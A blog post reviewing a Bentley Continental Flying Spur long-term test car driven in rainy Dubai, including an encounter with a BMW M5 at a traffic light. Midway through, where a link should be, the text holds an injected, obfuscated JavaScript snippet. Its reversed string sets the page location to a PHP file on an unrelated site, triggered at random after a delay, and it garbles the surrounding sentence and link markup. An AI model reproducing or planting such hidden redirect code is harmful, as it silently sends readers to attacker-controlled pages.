The Management Fleet Bentley Continental Flying Spur hits the Dubai high seas and (nearly) goes one-on-one with a BMW M5

Bentley ownership was going to be fun even if it was only as a temporary custodian rather than fulfilment of a lottery win dream. Visions of showing up to friends’ homes, the mall, restaurants or random social events dressed in my finest scruffy jeans and ripped shirt, playing it all down with a ‘this is how I roll’ casualness were all top of the to-do list.
The reality though was a lot different and began with an inclement change in the weather. Yes, on the night when the planets aligned and the Bentley was going to be mine all mine, it rained. Heavily. In large quantities. In Dubai.

Joking aside, the Bentley performed admirably (unintentional pun) and felt completely planted in the wet. No doubt this has, in some part, to do with its substantial curb weight but there wasn’t even a hint of shivering timbers from the rear. My real concern was other road users failing to adjust their driving to the conditions, such is the convention on the Dubai high seas. And with that, the Bentley lay in driveway dry dock for a few days looking a bit scummy and neglected while work commitments took priority.

With limited opportunity to take the Bentley out in daylight hours I grabbed the B by the wings and became a nocturnal cruiser. My usual haunts held little attraction and, like a moth to a flame, I found myself touring the empty streets of the Financial Sector one night. Quite befitting for the Bentley methinks.
The streets were, however, not as empty as I had assumed. In the latest episode in the ongoing series ‘Only in Dubai’ the Bentley caught the eye of a group of geezers in a sideways BMW M5 who dared to challenge the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/the-management-fleet-bentley-continental-flying-spur-sharing/” target=”_blank”>Continental Flying Spur Speed to a traffic light Grand Prix.

It may have a little over 600bhp and more torque than you can shake a big stick at, but our Bentley came fitted with the optional ‘you bend it you mend it’ policy direct from the manufacturer. Racing a bunch of geezers in an M5 was not how I roll. Had I done so, the Bentley may have surprised these young upstarts courtesy of serious grunt from the twin-turbo W12. However, planting the pedal in to the plush footwell carpet seemed so uncouth.
So, how did I roll in the big luxury Bentley bus? In style, naturally.
